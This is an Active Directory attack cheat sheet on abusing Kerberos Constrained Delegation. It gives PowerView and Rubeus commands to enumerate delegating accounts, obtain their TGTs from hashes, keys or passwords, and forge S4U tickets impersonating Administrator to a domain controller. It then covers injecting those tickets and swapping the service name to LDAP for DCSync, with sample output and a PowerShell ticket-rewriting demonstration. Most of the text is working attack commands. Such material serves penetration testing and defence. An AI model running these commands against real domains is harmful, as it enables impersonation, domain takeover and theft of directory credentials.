Microsoft introduced Constrained Delegation in Windows Server 2003 to provide a more secure form of delegation compared to the high-risk Unconstrained Delegation.
With Constrained Delegation, administrators list the SPNs (stored in the account's msDS-AllowedToDelegateTo attribute) to which a server is allowed to present tickets on behalf of a user, which limits the attack surface compared to Unconstrained Delegation. The limit is per service, not per user: if the delegating account is also flagged TRUSTED_TO_AUTH_FOR_DELEGATION (protocol transition, "Use any authentication protocol"), it can obtain a forwardable ticket for any user via S4U2self without that user ever authenticating to it. That is what the rest of this page abuses: compromising such an account lets an attacker impersonate any user who is not in Protected Users and not marked "Account is sensitive and cannot be delegated" to the listed services.
Enumeration
PowerView
# Get computer Constrained Delegation (-TrustedToAuth filters on msds-allowedtodelegateto=*;
# a UserAccountControl value containing 0x1000000 means protocol transition is enabled)
Get-DomainComputer -TrustedToAuth | Select DnsHostName,UserAccountControl,msds-allowedtodelegateto | FL

# Get user Constrained Delegation
Get-DomainUser -TrustedToAuth
PowerShell
# Search both users and computers for Constrained Delegation
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo,userAccountControl
Obtain TGT
# Triage current tickets (run elevated to see tickets from other logon sessions)
Rubeus.exe triage

# Dump the TGT of the account that holds the delegation (here the machine account, e.g. SRV01$)
Rubeus.exe dump /luid:[LUID] /service:krbtgt /user:[Hostname]$ /nowrap

# OR request a fresh TGT for the compromised account

# If you have the NTLM hash
Rubeus.exe asktgt /user:[User] /ntlm:[NTLMHash] /nowrap

# If you have the AES256 key
Rubeus.exe asktgt /user:[User] /aes256:[AES256Key] /nowrap

# If you have the plain text password
Rubeus.exe asktgt /user:[User] /password:[Password] /nowrap
# Triage current tickets (run elevated to see tickets from other logon sessions)
Invoke-Rubeus -Command "triage"

# Dump the TGT of the account that holds the delegation (here the machine account, e.g. SRV01$)
Invoke-Rubeus -Command "dump /luid:[LUID] /service:krbtgt /user:[Hostname]$ /nowrap"

# OR request a fresh TGT for the compromised account

# If you have the NTLM hash
Invoke-Rubeus -Command "asktgt /user:[User] /ntlm:[NTLM Hash] /nowrap"

# If you have the AES256 key
Invoke-Rubeus -Command "asktgt /user:[User] /aes256:[AES256 Key] /nowrap"

# If you have the plain text password
Invoke-Rubeus -Command "asktgt /user:[User] /password:[Password] /nowrap"
Obtain TGS for service
# Use the delegating account's TGT to request a service ticket for the delegated SPN while impersonating another user.
# /user is the account that holds the delegation (e.g. SRV01$) and /ticket its TGT; /impersonateuser is the target;
# /msdsspn must exactly match an entry in the delegating account's msDS-AllowedToDelegateTo
Rubeus.exe s4u /impersonateuser:[TargetUser] /msdsspn:[service/FQDN] /user:[DelegatingAccount] /ticket:[Base64ticket] /nowrap
[*] Action: S4U
[*] Building S4U2self request for: 'SRV01$@SECURITY.LOCAL'
[*] Using domain controller: DC01.Security.local (10.10.10.100)
[*] Sending S4U2self request to 10.10.10.100:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'SRV01$@SECURITY.LOCAL'
[*] base64(ticket.kirbi):
[Base64 Ticket Output]
[*] Impersonating user 'Administrator' to target SPN 'cifs/dc01.security.local'
[*] Building S4U2proxy request for service: 'cifs/dc01.security.local'
[*] Using domain controller: DC01.Security.local (10.10.10.100)
[*] Sending S4U2proxy request to domain controller 10.10.10.100:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc01.security.local':
[Base64 Ticket Output]
# Use the delegating account's TGT to request a service ticket for the delegated SPN while impersonating another user.
# /user is the account that holds the delegation (e.g. SRV01$) and /ticket its TGT; /impersonateuser is the target;
# /msdsspn must exactly match an entry in the delegating account's msDS-AllowedToDelegateTo
Invoke-Rubeus -Command "s4u /impersonateuser:[TargetUser] /msdsspn:[service/FQDN] /user:[DelegatingAccount] /ticket:[Base64 ticket] /nowrap"
# The ticket to pass is the final S4U2proxy ticket (the last base64 blob, issued for the target SPN), not the S4U2self one.

# Method 1: Pass the ticket into a separate logon session (preferred)
# Create a new logon session / LUID (requires elevation)
Rubeus.exe createnetonly /program:c:\windows\system32\cmd.exe /show

# Pass the ticket into the new session
Rubeus.exe ptt /luid:[LUID from previous command] /ticket:[Base64ticket]

# Method 2: Pass the ticket directly into the current session (can break existing authentication in that session)
Rubeus.exe ptt /ticket:[Base64ticket]
# The ticket to pass is the final S4U2proxy ticket (the last base64 blob, issued for the target SPN), not the S4U2self one.

# Method 1: Pass the ticket into a separate logon session (preferred)
# Create a new logon session / LUID (requires elevation)
Invoke-Rubeus -Command "createnetonly /program:c:\windows\system32\cmd.exe /show"

# Pass the ticket into the new session
Invoke-Rubeus -Command "ptt /luid:[LUID from previous command] /ticket:[Base64 ticket]"

# Method 2: Pass the ticket directly into the current session (can break existing authentication in that session)
Invoke-Rubeus -Command "ptt /ticket:[Base64 ticket]"
The injected ticket gives us the Domain Administrator's rights to the CIFS service on DC01 only, since that is the SPN the ticket was issued for. That is enough for anything carried over SMB from the new session, such as PsExec against DC01 or listing \\dc01.security.local\C$; other services on the DC need a ticket for their own SPN, which the next section covers.
Alternate Service Name
Kerberos uses a Service Principal Name (SPN) to identify a service during authentication, typically the service class plus the host the service runs on (cifs/dc01.security.local). The service name sits in the unencrypted part of the ticket, while the encrypted part is sealed under the long-term key of the account the service runs as. Every service on a host that runs as that host's machine account (cifs, ldap, host, http and so on) shares the same key, so a ticket issued for cifs/dc01 can be re-labelled ldap/dc01 on the client side and DC01 will still decrypt and accept it. Rubeus exposes this through the /altservice option on s4u, which substitutes a different service class into the final ticket. This is useful when the delegation entry lists a service you do not want but another service on the same host is the real target. It does not work across accounts: a service on the same host that runs under its own domain account (a SQL instance with its own SPN, for example) has a different key.
In this instance, we're leveraging the TGT issued for SRV01$ to obtain a TGS for LDAP on DC01, requested through the cifs/dc01.security.local delegation entry.
Following on from the section "Obtain TGT", add /altservice:ldap to the s4u command from the previous section. Rubeus still asks the KDC for the listed SPN (cifs/dc01.security.local) and rewrites the service name locally, as the output below shows.
[*] Action: S4U
[*] Building S4U2self request for: 'SRV01$@SECURITY.LOCAL'
[*] Using domain controller: DC01.Security.local (10.10.10.100)
[*] Sending S4U2self request to 10.10.10.100:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'SRV01$@SECURITY.LOCAL'
[*] base64(ticket.kirbi):
[Base64 Ticket Output]
[*] Impersonating user 'administrator' to target SPN 'cifs/dc01.security.local'
[*] Final ticket will be for the alternate service 'ldap'
[*] Building S4U2proxy request for service: 'cifs/dc01.security.local'
[*] Using domain controller: DC01.Security.local (10.10.10.100)
[*] Sending S4U2proxy request to domain controller 10.10.10.100:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'ldap'
[*] base64(ticket.kirbi) for SPN 'ldap/dc01.security.local':
[Base64 Ticket Output]
In the above output the CIFS service name is swapped for LDAP after the S4U2proxy exchange; the KDC never saw a request for ldap/dc01.security.local. Because the Domain Administrator has been impersonated to LDAP on a Domain Controller, this ticket can be used to perform DCSync, since the directory replication interface on the DC accepts an ldap service ticket.
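To make the reason /altservice works concrete, here is an added example that is not code from the original page or from Rubeus: a minimal DER walker over the Kerberos Ticket structure (RFC 4120 section 5.3). It builds a constructed ticket for cifs/dc01.security.local in which random bytes stand in for the real enc-part ciphertext, reads the service name out of the cleartext sname field, rewrites it to ldap, and shows that the enc-part is untouched. A real kirbi from Rubeus wraps the Ticket inside a KRB-CRED, so you would extract the Ticket first; the helper and function names below are this example's own.

```powershell
# Added example: why the service name in a Kerberos ticket can be swapped client-side.
function New-DerTlv {
    param([int]$Tag, [byte[]]$Content)
    $len = $Content.Length
    # DER length: short form under 128 bytes, otherwise 0x81/0x82 followed by the big-endian length
    $lenBytes = if ($len -lt 0x80) { [byte[]]@($len) }
                elseif ($len -lt 0x100) { [byte[]]@(0x81, $len) }
                else { [byte[]]@(0x82, ($len -shr 8), ($len -band 0xFF)) }
    return [byte[]](@([byte]$Tag) + $lenBytes + $Content)
}
function New-DerString { param([string]$s) New-DerTlv 0x1B ([Text.Encoding]::ASCII.GetBytes($s)) }  # GeneralString
function New-DerInt    { param([int]$v)    New-DerTlv 0x02 ([byte[]]@($v)) }                        # INTEGER, values below 128 only
function New-DerCtx    { param([int]$n, [byte[]]$Inner) New-DerTlv (0xA0 + $n) $Inner }             # [n] EXPLICIT context tag

function New-PrincipalName {
    # PrincipalName ::= SEQUENCE { name-type [0] Int32, name-string [1] SEQUENCE OF KerberosString }
    param([int]$NameType, [string[]]$Parts)
    [byte[]]$strings = @()
    foreach ($p in $Parts) { $strings += [byte[]](New-DerString $p) }
    New-DerTlv 0x30 ([byte[]]((New-DerCtx 0 (New-DerInt $NameType)) + (New-DerCtx 1 (New-DerTlv 0x30 $strings))))
}

function Read-DerTlv {
    # Returns the tag, where the content starts and where the whole TLV ends
    param([byte[]]$Bytes, [int]$Offset)
    $tag = $Bytes[$Offset]; $len = [int]$Bytes[$Offset + 1]; $hdr = 2
    if ($len -ge 0x80) {
        $n = $len -band 0x7F; $len = 0
        for ($i = 0; $i -lt $n; $i++) { $len = ($len -shl 8) + [int]$Bytes[$Offset + 2 + $i] }
        $hdr = 2 + $n
    }
    [pscustomobject]@{ Tag = $tag; Start = $Offset + $hdr; End = $Offset + $hdr + $len }
}
function Get-DerChildren {
    # Splits the content of a constructed TLV into its immediate child TLVs (raw bytes)
    param([byte[]]$Bytes, [int]$Start, [int]$End)
    $pos = $Start
    while ($pos -lt $End) {
        $c = Read-DerTlv $Bytes $pos
        [pscustomobject]@{ Tag = $c.Tag; Raw = [byte[]]$Bytes[$pos..($c.End - 1)] }
        $pos = $c.End
    }
}
function Get-DerChild {
    # First child of a constructed TLV with the given tag
    param([byte[]]$Bytes, [int]$Tag)
    $outer = Read-DerTlv $Bytes 0
    @(Get-DerChildren $Bytes $outer.Start $outer.End) | Where-Object { $_.Tag -eq $Tag } | Select-Object -First 1
}

function Get-TicketServiceName {
    # Ticket ::= [APPLICATION 1] SEQUENCE { tkt-vno [0], realm [1], sname [2], enc-part [3] }
    param([byte[]]$Ticket)
    $seqRaw = (Get-DerChild $Ticket 0x30).Raw
    $sname  = Get-DerChild $seqRaw 0xA2          # [2] sname: in the clear, not covered by the ticket key
    $pn     = Get-DerChild $sname.Raw 0x30       # PrincipalName
    $ns     = Get-DerChild $pn.Raw 0xA1          # [1] name-string
    $seqOf  = Get-DerChild $ns.Raw 0x30
    $inner  = Read-DerTlv $seqOf.Raw 0
    $parts  = @(Get-DerChildren $seqOf.Raw $inner.Start $inner.End) | ForEach-Object {
        $t = Read-DerTlv $_.Raw 0
        [Text.Encoding]::ASCII.GetString($_.Raw, $t.Start, $t.End - $t.Start)
    }
    @($parts) -join '/'
}

function Set-TicketServiceName {
    # Rebuild the Ticket with a new service class; every other TLV, including the
    # enc-part sealed under the host's key, is copied byte-for-byte.
    param([byte[]]$Ticket, [string]$NewService)
    $parts = (Get-TicketServiceName $Ticket) -split '/'
    $parts[0] = $NewService
    $seqRaw = (Get-DerChild $Ticket 0x30).Raw
    $seq = Read-DerTlv $seqRaw 0
    [byte[]]$body = @()
    foreach ($child in @(Get-DerChildren $seqRaw $seq.Start $seq.End)) {
        if ($child.Tag -eq 0xA2) { $body += [byte[]](New-DerCtx 2 (New-PrincipalName 2 $parts)) }  # name-type 2 = NT-SRV-INST
        else                     { $body += $child.Raw }
    }
    New-DerTlv 0x61 (New-DerTlv 0x30 $body)   # 0x61 = [APPLICATION 1]
}

# Constructed sample ticket for cifs/dc01.security.local; 64 random bytes stand in for the ciphertext
[byte[]]$cipher = New-Object byte[] 64
(New-Object System.Random 1).NextBytes($cipher)
$encPart = New-DerTlv 0x30 ([byte[]]((New-DerCtx 0 (New-DerInt 18)) + (New-DerCtx 2 (New-DerTlv 0x04 $cipher))))  # etype 18, cipher
[byte[]]$fields = (New-DerCtx 0 (New-DerInt 5)) + (New-DerCtx 1 (New-DerString 'SECURITY.LOCAL')) +
                  (New-DerCtx 2 (New-PrincipalName 2 @('cifs', 'dc01.security.local'))) + (New-DerCtx 3 $encPart)
$cifsTicket = New-DerTlv 0x61 (New-DerTlv 0x30 $fields)
$ldapTicket = Set-TicketServiceName $cifsTicket 'ldap'

'sname before : ' + (Get-TicketServiceName $cifsTicket)
'sname after  : ' + (Get-TicketServiceName $ldapTicket)
# The enc-part (the trailing 64 bytes) is identical, so DC01$'s key still decrypts it
$same = [Convert]::ToBase64String([byte[]]$cifsTicket[-64..-1]) -eq [Convert]::ToBase64String([byte[]]$ldapTicket[-64..-1])
'enc-part intact: ' + $same
```

The only part of the ticket the target service can verify is the enc-part, and it verifies it with its own key, which for ldap/dc01 and cifs/dc01 is the same DC01$ key. Nothing in the encrypted part names the service, so the host has no way to notice that the KDC issued this ticket for cifs; the same reasoning is why the substitution fails for a service running under a separate service account.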